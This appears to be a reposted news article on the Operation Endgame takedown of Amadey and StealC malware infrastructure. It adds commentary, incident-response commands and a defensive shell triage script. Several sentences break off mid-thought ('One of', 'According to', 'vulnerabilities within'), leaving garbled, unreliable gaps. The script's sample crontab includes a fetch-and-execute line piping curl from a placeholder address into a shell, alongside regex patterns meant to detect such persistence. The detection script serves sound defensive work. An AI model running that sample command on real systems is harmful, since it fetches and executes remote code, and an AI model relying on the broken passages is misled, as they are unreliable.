Global Cybercrime Infrastructure Crippled as Operation Endgame Targets Amadey and StealC Malware Networks + Video

Introduction

A major international cybersecurity operation has dealt one of the strongest blows yet against the modern malware economy. Law enforcement agencies working alongside leading cybersecurity firms successfully dismantled large portions of the infrastructure supporting two notorious malware families, Amadey and StealC. The operation represents far more than a simple server seizure. It directly targeted the hidden ecosystem that enables ransomware attacks, credential theft, financial fraud, and large-scale cybercrime across the world.

The action forms part of the broader Operation Endgame initiative, an ongoing multinational effort focused on disrupting malware services before they can be used to launch devastating attacks. Authorities not only removed servers and domains but also identified millions of stolen credentials, restricted access to criminal cryptocurrency assets, and severed command-and-control channels used by threat actors to manage infected devices. The operation demonstrates how governments and private security companies are increasingly coordinating their efforts to strike at the infrastructure that fuels cybercrime-as-a-service operations.

Operation Endgame Expands Its Reach

The latest phase of Operation Endgame brought together law enforcement agencies from Belgium, Canada, Denmark, France, Germany, the Netherlands, the United Kingdom, and the United States. Cybersecurity companies including Microsoft, Bitdefender, ESET, and Bitsight played a critical role by providing technical intelligence and infrastructure analysis.

Over a two-week campaign, investigators successfully dismantled 326 servers and seized 142 malicious domains associated with malware distribution activities. Authorities also identified and restricted over $47 million worth of cryptocurrency believed to be linked to criminal operations.

Perhaps even more significant was the recovery of approximately 27 million stolen login credentials. These credentials could have been used for identity theft, account takeovers, ransomware deployment, espionage campaigns, and financial fraud operations targeting both individuals and enterprises.

The coordinated action illustrates how modern cybercrime networks depend heavily on infrastructure. Removing that infrastructure can be more damaging than simply arresting individual operators because it disrupts entire criminal supply chains.

The Growing Threat of Malware-as-a-Service

Cybercriminals increasingly operate under a Malware-as-a-Service (MaaS) business model. Instead of developing malware themselves, attackers can effectively rent malicious tools through subscription services.

Amadey and StealC are prime examples of this model. Their developers provide malware platforms while affiliates focus on infecting victims and monetizing stolen data.

This business approach mirrors legitimate software industries. Criminal developers maintain products, release updates, provide support, and charge licensing fees. Affiliates gain access to sophisticated attack capabilities without needing advanced programming knowledge.

The result is a thriving underground marketplace where malware deployment becomes accessible to a much wider pool of threat actors.

Understanding

Amadey first emerged in 2018 and rapidly became one of the most widely used malware loaders in the underground ecosystem.

Unlike ransomware that directly encrypts files,

Once installed, the malware can perform numerous actions:

System Fingerprinting and Reconnaissance

Amadey collects detailed information about infected devices, allowing attackers to evaluate potential targets before deploying additional malware.

The gathered intelligence helps threat actors determine whether a system belongs to an individual user, a corporation, or a high-value organization.

Payload Delivery Capabilities

One of

This flexibility allows attackers to transform a simple infection into a full-scale compromise.

Remote Control Features

The malware includes extensive remote access functionality.

Attackers can:

Execute commands remotely

Open SOCKS proxy connections

Enable Remote Desktop Protocol access

Launch reverse proxy sessions

Establish VNC remote control sessions

These capabilities effectively turn infected systems into remotely controlled assets.

Credential and Data Theft

Amadey can capture clipboard contents and harvest stored credentials, giving attackers access to sensitive information ranging from passwords to cryptocurrency wallet addresses.

The Rapid Expansion of Amadey

Cybersecurity researchers observed a dramatic rise in Amadey activity between 2023 and 2025.

What began as a relatively small malware operation evolved into a widespread criminal platform. Researchers recorded malware sample distributions rising from only dozens of payloads in 2019 to more than eleven thousand payloads during 2025.

The increase highlights how malware ecosystems can scale rapidly once they gain popularity among criminal affiliates.

Despite recent declines in command-and-control server activity, Amadey remained a critical component of many attack chains entering 2026.

StealC: The Modern Information Stealer

While Amadey focuses on gaining initial access, StealC specializes in extracting valuable information from infected systems.

Introduced in 2023, the malware quickly became popular among cybercriminals because of its affordability, flexibility, and continuous development.

StealC targets a wide range of sensitive information.

Browser Data Theft

The malware aggressively targets Chromium-based browsers.

It can collect:

Saved passwords

Session cookies

Autofill information

Browsing histories

Credit card details

Browser extension data

These stolen assets are highly valuable because session cookies often allow attackers to bypass password requirements entirely.

Application Credential Harvesting

StealC extends beyond web browsers.

The malware targets applications including:

Discord

Telegram

Steam

Microsoft Outlook

FileZilla

Foxmail

This enables attackers to gather both personal and corporate credentials from a single infected system.

Secondary Malware Delivery

Like Amadey, StealC also functions as a malware loader.

Attackers can issue commands that instruct infected systems to download and execute additional payloads, creating opportunities for ransomware deployment and advanced intrusions.

Why StealC Avoids Certain Countries

One unusual characteristic of StealC is its geographic filtering capability.

The malware checks system language settings and may terminate itself if it detects environments associated with Russia, Belarus, Kazakhstan, Ukraine, or Uzbekistan.

This behavior has become common among malware developed by operators located within regions where local infections could attract unwanted attention from domestic authorities.

Amadey demonstrates similar restrictions by disabling certain credential theft functions on systems configured for specific regional settings.

Vulnerabilities Found Inside Criminal Infrastructure

Ironically, security researchers discovered serious vulnerabilities within

Researchers identified weaknesses including cross-site scripting vulnerabilities and directory traversal flaws that exposed operational details about the malware service.

These security flaws reportedly allowed researchers to gain insights into customer activity and potentially exposed information belonging to malware affiliates.

One vulnerability even made it possible to upload web shells to StealC command-and-control servers before developers eventually released patches.

The discovery highlights a recurring pattern within underground cybercrime operations: attackers often fail to maintain the same security standards they exploit against victims.

Microsoft Reveals Massive Infection Numbers

According to

The company also reported identifying over 18,000 victim systems and successfully disrupting criminal control mechanisms connected to those devices.

Additionally, approximately 200 malicious command-and-control domains and IP addresses were neutralized through legal actions, domain seizures, registrations, and provider notifications.

These figures provide a glimpse into the extraordinary scale at which modern malware ecosystems operate.

The Relationship Between Loaders and Stealers

Cybersecurity experts often describe loaders and information stealers as two interconnected stages of the same criminal business process.

A loader gains access.

A stealer monetizes that access.

Once credentials, cookies, and financial information are harvested, the data is sold through underground marketplaces, encrypted messaging channels, and cybercrime forums.

This process transforms individual infections into recurring revenue streams for cybercriminal organizations.

Disrupting either side of the chain creates challenges for attackers. Disrupting both simultaneously can significantly weaken entire criminal ecosystems.

What Undercode Says:

The significance of this operation extends far beyond the seizure of a few hundred servers.

Operation Endgame is increasingly targeting infrastructure instead of individuals.

Historically, arresting malware developers often produced only temporary disruptions.

New operators would quickly replace them.

Infrastructure takedowns create wider ripple effects.

Removing command-and-control servers breaks communication channels.

Seizing domains interrupts malware delivery.

Blocking cryptocurrency wallets disrupts monetization.

Recovering credentials reduces criminal inventory.

The Amadey-StealC partnership demonstrates how specialized cybercrime has become.

One malware family gains access.

Another steals data.

Others deploy ransomware.

Different groups cooperate within a shared ecosystem.

This modular approach resembles legitimate cloud services.

Every criminal service focuses on a specific task.

The operation also reveals growing collaboration between governments and private security companies.

Modern cybercrime investigations increasingly depend on threat intelligence supplied by technology vendors.

Without telemetry from global security platforms, identifying infrastructure at this scale would be difficult.

Another important trend is the growing use of legal mechanisms.

Domain seizures and court orders now complement traditional law enforcement tactics.

The malware economy depends heavily on trust among criminals.

Infrastructure disruptions weaken that trust.

Affiliates become uncertain whether platforms remain secure.

Developers lose customers.

Revenue streams decline.

Confidence in underground services deteriorates.

The discovery of vulnerabilities inside StealC infrastructure is particularly noteworthy.

Cybercriminal platforms often prioritize offensive capabilities over defensive security.

Researchers increasingly exploit those weaknesses.

This creates opportunities for intelligence collection and disruption.

The operation also highlights the importance of attacking the initial access stage.

Most ransomware incidents begin with a foothold.

Preventing that foothold eliminates later stages of the attack chain.

Organizations should view loaders such as Amadey with the same level of concern as ransomware itself.

By the time ransomware appears, attackers have often spent days or weeks inside a network.

Stopping loaders can prevent the entire compromise lifecycle.

The takedown may not eliminate Amadey or StealC permanently.

However, it raises operational costs for criminals.

Higher costs generally translate into reduced activity.

That remains one of the most effective strategies in long-term cybercrime disruption.

Deep Analysis: Linux, Windows, and Incident Response Commands

Monitoring Suspicious Network Connections

netstat -antp
ss -tulnp
lsof -i

Investigating Running Processes

ps aux
top
htop
pstree

Searching for Persistence Mechanisms

crontab -l
systemctl list-unit-files
find /etc/systemd -type f

Reviewing Authentication Activity

last
lastlog
journalctl -xe

Identifying Malware Downloads

find /tmp -type f
find /var/tmp -type f
find /home -name "*.sh"

Monitoring DNS Activity

tcpdump -i any port 53

Examining Open Files

lsof
fuser -v

Windows Investigation Commands

tasklist
netstat -ano
whoami
ipconfig /all

PowerShell Threat Hunting

Get-Process
Get-Service
Get-ScheduledTask
Get-WinEvent

Memory and Forensic Collection

dmesg
journalctl
vmstat
iostat

These commands help defenders identify suspicious processes, unusual outbound communications, unauthorized persistence mechanisms, and indicators frequently associated with loader malware and information stealers.
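The commands above produce raw listings that still have to be read by hand. The helper script below is an added example, not part of the article or of any tool it mentions: it post-processes "ps aux" and crontab output and flags two patterns often seen with loader malware, a process whose executable lives in a temporary directory and a cron entry that fetches remote content into a shell or runs a payload from such a directory. The directory list, the regular expressions, the sample process table and the sample crontab (including its 198.51.100.10 documentation-range address) are constructed assumptions for the demonstration; a real triage would tune them to the host.

```shell
#!/bin/sh
# Added triage helper (not from the article). It filters the output of the
# commands listed above rather than replacing them. Every pattern and sample
# line here is a constructed assumption, not an indicator from the operation.

# Directories a loader commonly writes a payload to before executing it.
SUSPICIOUS_DIRS='/tmp/|/var/tmp/|/dev/shm/'

# Read "ps aux" style lines on stdin and print "PID COMMAND" for every
# process whose executable (field 11) lives under SUSPICIOUS_DIRS.
flag_tmp_processes() {
    awk -v pat="^(${SUSPICIOUS_DIRS})" 'NR > 1 && $11 ~ pat { print $2, $11 }'
}

# Read crontab / cron.d lines on stdin and print entries that either pipe
# curl/wget output straight into a shell or execute from SUSPICIOUS_DIRS.
# Comment and blank lines are dropped first; no match is not an error.
flag_cron_entries() {
    grep -Ev '^[[:space:]]*(#|$)' \
      | grep -E "(curl|wget)[^|]*[|][[:space:]]*(ba)?sh([[:space:]]|$)|(${SUSPICIOUS_DIRS})" \
      || true
}

# Live use on a host: feed the real command output through the helpers.
triage_report() {
    echo "== processes running from temporary directories =="
    ps aux | flag_tmp_processes
    echo "== cron entries that fetch-and-execute or run from temp dirs =="
    { crontab -l 2>/dev/null; cat /etc/cron.d/* 2>/dev/null; } | flag_cron_entries
}

# Constructed sample "ps aux" output for an offline demonstration.
SAMPLE_PS='USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.1 1000 500 ? Ss 10:00 0:01 /sbin/init
alice 2231 0.2 0.5 5000 2000 ? S 10:05 0:00 /tmp/.x/updater
alice 2240 0.0 0.1 3000 900 pts/0 S+ 10:06 0:00 /usr/bin/vim'

# Constructed sample crontab; the address is from the documentation range.
SAMPLE_CRON='# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew
*/5 * * * * curl -s http://198.51.100.10/p.sh | sh
@reboot /var/tmp/.cache/run'

# Demonstration on the constructed samples (only runs when executed directly).
if [ "${0##*/}" = "triage.sh" ]; then
    printf '%s\n' "$SAMPLE_PS" | flag_tmp_processes
    printf '%s\n' "$SAMPLE_CRON" | flag_cron_entries
fi
```

Save it as triage.sh and run it for the sample output, or source it on a host and call triage_report. The process check keys on the executable path because a loader dropped into /tmp or /dev/shm rarely bothers to move itself; the cron check catches the two persistence shapes a quick "crontab -l" review most often misses when the entry is buried among legitimate jobs.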

✅ Europol, multiple law enforcement agencies, and private cybersecurity companies coordinated a major disruption operation targeting Amadey and StealC infrastructure.

✅ Authorities reported dismantling hundreds of servers, seizing domains, identifying millions of stolen credentials, and restricting cryptocurrency assets linked to cybercrime operations.

✅ Amadey and StealC are established Malware-as-a-Service platforms that have been actively used for malware delivery, credential theft, and broader cybercriminal campaigns worldwide.

❌ There is no evidence that the takedown permanently eliminated either malware family. Criminal operators often attempt to rebuild infrastructure after major disruptions.

❌ Infection statistics and operational claims should be interpreted as snapshots in time because malware ecosystems constantly evolve and adapt.

Prediction

(+1) Continued cooperation between global law enforcement agencies and cybersecurity vendors will result in more infrastructure-level takedowns targeting malware distribution networks.

(+1) Increased pressure on malware operators will likely force cybercriminal groups to invest more resources into operational security, raising their costs and reducing profitability.

(+1) Future operations may increasingly focus on cryptocurrency tracing, credential marketplaces, and affiliate recruitment channels rather than only malware servers.

(-1) Amadey and StealC operators may attempt to rebuild portions of their infrastructure using new hosting providers, fresh domains, and updated malware variants.

(-1) Cybercriminal affiliates displaced by this operation could migrate toward alternative Malware-as-a-Service platforms, creating new threats for defenders.

(-1) The cybercrime ecosystem is likely to remain highly adaptive, meaning similar malware services may emerge even as current infrastructure is dismantled.

References:

Reported By: thehackernews.com